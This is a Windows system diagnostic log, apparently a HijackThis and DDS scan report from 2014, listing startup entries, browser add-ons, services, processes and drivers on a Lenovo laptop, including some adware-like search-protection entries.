O4 - HKLM\..\Run: [Lenovo SlideNav2] "C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe"
O4 - HKLM\..\Run: [AVP] "C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe"
O4 - HKLM\..\Run: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
O4 - HKLM\..\Run: [YouCam Mirage] "C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe"
O4 - HKLM\..\Run: [YouCam Tray] "C:\Program Files (x86)\Lenovo\YouCam\YouCam.exe" /s
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [Search Protection] C:\ProgramData\Search Protection\SearchProtection.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [AmazonMP3DownloaderHelper] C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
O4 - HKCU\..\Run: [StrongVPN Client] "C:\Program Files (x86)\StrongVPN\StrongDial.exe" --silent
O4 - HKUS\S-1-5-18\..\RunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601 (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601 (User 'Default user')
O4 - Startup: Dropbox.lnk = tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
O4 - Global Startup: CrashPlan Tray.lnk = C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
O8 - Extra context menu item: Add to Anti-Banner - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\ie_banner_deny.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Send image to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie_ctx.htm
O8 - Extra context menu item: Send page to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: Virtual Keyboard - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send To Bluetooth - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: Send to &Bluetooth Device... - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: URLs check - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\windows\system32\atiesrxx.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Kaspersky Anti-Virus Service (AVP) - Kaspersky Lab ZAO - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
O23 - Service: Bluetooth Driver Management Service (BcmBtRSupport) - Unknown owner - C:\windows\system32\BtwRSupportService.exe (file missing)
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\Lenovo\Bluetooth Software\btwdins.exe
O23 - Service: CrashPlan Backup Service (CrashPlanService) - CrashPlan - C:\Program Files (x86)\CrashPlan\CrashPlanService.exe
O23 - Service: CryptoStorage control service (CSObjectsSrv) - Infowatch - C:\Program Files (x86)\Common Files\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Oasis2Service - Unknown owner - C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: Slidebar Notifier Service - Lenovo - C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNotifier.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12974 bytes



DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17126 BrowserJavaVersion: 10.60.2
Run by tk at 20:01:10 on 2014-06-24
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.8173.4888 [GMT -7:00]
.
AV: Kaspersky PURE 3.0 *Enabled/Updated* {C3113FBF-4BCB-4461-D78D-6EDFEC9593E5}
SP: Kaspersky PURE 3.0 *Enabled/Updated* {7870DE5B-6DF1-4BEF-ED3D-55AD9712D958}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky PURE 3.0 *Enabled* {FB2ABE9A-01A4-4539-FCD2-C7EA1246D49E}
.
============== Running Processes ===============
.
C:\windows\system32\lsm.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\system32\atiesrxx.exe
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k GPSvcGroup
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\atieclxx.exe
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
C:\windows\system32\BtwRSupportService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Lenovo\Bluetooth Software\btwdins.exe
C:\Program Files (x86)\CrashPlan\CrashPlanService.exe
C:\Program Files (x86)\Common Files\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe
C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe
C:\windows\system32\Dwm.exe
C:\windows\system32\taskhost.exe
C:\windows\Explorer.EXE
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNotifier.exe
C:\windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\windows\system32\svchost.exe -k bthsvcs
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Synaptics\SynTP\SynBtnAsst.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeySupport.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\windows\system32\taskeng.exe
C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe
C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\Lenovo\Lenovo MuteSync\MuteSync.exe
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe
C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNavigator.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
C:\windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\windows\System32\svchost.exe -k secsvcs
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
C:\windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\BodyMedia\Sync\BodyMediaSync.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_13_0_0_214.exe
C:\windows\system32\SearchProtocolHost.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\taskhost.exe
C:\windows\system32\NOTEPAD.EXE
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
mWinlogon: Userinit = userinit.exe
BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\OnlineBanking\online_banking_bho.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
uRun: [AmazonMP3DownloaderHelper] C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
uRun: [StrongVPN Client] "C:\Program Files (x86)\StrongVPN\StrongDial.exe" --silent
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [MuteSync] C:\PROGRA~2\Lenovo\LENOVO~1\MuteSync.exe
mRun: [VeriFaceManager] C:\Program Files (x86)\Lenovo\VeriFace\PManage.exe
mRun: [Lenovo SlideNav2] "C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlideNavVDM.exe"
mRun: [AVP] "C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe"
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [YouCam Mirage] "C:\Program Files (x86)\Lenovo\YouCam\YCMMirage.exe"
mRun: [YouCam Tray] "C:\Program Files (x86)\Lenovo\YouCam\YouCam.exe" /s
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [HP Software Update] C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Search Protection] C:\ProgramData\Search Protection\SearchProtection.exe
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
dRunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
StartupFolder: C:\Users\tk\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Drop box.lnk - C:\Users\tk\AppData\Roaming\Dropbox\bin\Dropbox.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\CRASHP~1.LNK - C:\Program Files (x86)\CrashPlan\CrashPlanTray.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Add to Anti-Banner - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\ie_banner_deny.htm
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
IE: Send image to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\IEExt\UrlAdvisor\klwtbbho.dll
TCP: NameServer = 68.105.28.11 68.105.29.11 68.105.28.12
TCP: Interfaces\{67059FF0-CB67-4A42-862C-5A9559E73FD2} : DHCPNameServer = 8.8.8.8 8.8.4.4 172.16.2.5
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D} : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\47B666F65727 : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\84643535D275966496 : DHCPNameServer = 8.8.8.8 8.8.4.4
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\C616B65667963647F627961623 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{8F5762E6-E089-419F-AFE3-DE09DC69060D}\D49784F64744F676 : DHCPNameServer = 210.154.134.150 180.131.208.53
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
x64-BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\OnlineBanking\online_banking_bho.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE3
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SynBtnAsst] C:\Program Files (x86)\Synaptics\SynTP\SynBtnAsst.exe Utility_Window
x64-Run: [OnekeyStudio] C:\Program Files (x86)\Lenovo\Onekey Theater\OnekeyStudio.exe
x64-Run: [EnergyUtility] C:\Program Files (x86)\Lenovo\Energy Management\utility.exe
x64-Run: [Energy Management] C:\Program Files (x86)\Lenovo\Energy Management\Energy Management.exe
x64-Run: [Logitech Download Assistant] C:\windows\System32\rundll32.exe C:\windows\System32\LogiLDA.dll,LogiFetch
x64-IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIERes\AddNote.html
x64-IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\Lenovo\Bluetooth Software\btsendto_ie.htm
x64-IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\tk\AppData\Roaming\Mozilla\Firefox\Profiles\e72isk5b.default\
FF - prefs.js: browser.search.selectedEngine - SecureSearch
FF - prefs.js: browser.startup.homepage - about:home
FF - component: C:\Program Files (x86)\McAfee\SiteAdvisor\components\McFFPlg.dll
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Mozilla Firefox\browser\plugins\npMozCouponPrinter.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\tk\AppData\Local\Fuze Box\Fuze Meeting\npfuzeshare.dll
FF - plugin: C:\Users\tk\AppData\Local\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin10181.dll
FF - plugin: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll
.
---- FIREFOX POLICIES ----
FF - user.js: general.useragent.extra.brc -
.
============= SERVICES / DRIVERS ===============
.
R0 CSCrySec;InfoWatch Encrypt Sector Library driver;C:\windows\System32\drivers\CSCrySec.sys [2013-7-14 84536]
R0 LHDmgr;LHDmgr;C:\windows\System32\drivers\LhdX64.sys [2011-5-4 39008]
R1 BdfNdisf;BitDefender Firewall NDIS 6 Filter Driver;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Firewall Engine\1.6.0.0\Drivers\bdfndisf6.sys [2013-10-21 93160]
R1 bdfwfpf;bdfwfpf;C:\Program Files\Lavasoft\Ad-Aware Antivirus\Firewall Engine\1.6.0.0\Drivers\bdfwfpf.sys [2013-10-21 102992]
R1 CSVirtualDiskDrv;InfoWatch Virtual Disk driver;C:\windows\System32\drivers\CSVirtualDiskDrv.sys [2013-7-14 66616]
R1 KLIM6;Kaspersky Anti-Virus NDIS 6 Filter;C:\windows\System32\drivers\klim6.sys [2012-8-2 29792]
R1 kltdi;kltdi;C:\windows\System32\drivers\kltdi.sys [2012-10-18 54368]
R1 kneps;kneps;C:\windows\System32\drivers\kneps.sys [2012-8-13 178448]
R2 AMD External Events Utility;AMD External Events Utility;C:\windows\System32\atiesrxx.exe [2010-12-1 203264]
R2 AVP;Kaspersky Anti-Virus Service;C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\avp.exe [2012-12-20 356128]
R2 BcmBtRSupport;Bluetooth Driver Management Service;C:\windows\System32\BtwRSupportService.exe [2013-10-28 2255064]
R2 CrashPlanService;CrashPlan Backup Service;C:\Program Files (x86)\CrashPlan\CrashPlanService.exe [2013-4-8 152576]
R2 CSObjectsSrv;CryptoStorage control service;C:\Program Files (x86)\Common Files\InfoWatch\CryptoStorage\ProtectedObjectsSrv.exe [2012-12-21 819040]
R2 Oasis2Service;Oasis2Service;C:\Program Files (x86)\DDNi\Oasis2Service 1.0\Oasis2Service.exe [2010-12-22 46080]
R2 Slidebar Notifier Service;Slidebar Notifier Service;C:\Program Files\Lenovo\Lenovo SlideNav\SlidebarNavigator\SlidebarNotifier.exe [2011-5-4 69568]
R3 ACPIVPC;Lenovo Virtual Power Controller Driver;C:\windows\System32\drivers\AcpiVpc.sys [2011-5-4 28176]
R3 bcbtums;Bluetooth USB LD Filter;C:\windows\System32\drivers\bcbtums.sys [2013-10-28 170712]
R3 btwampfl;btwampfl;C:\windows\System32\drivers\btwampfl.sys [2013-10-28 166104]
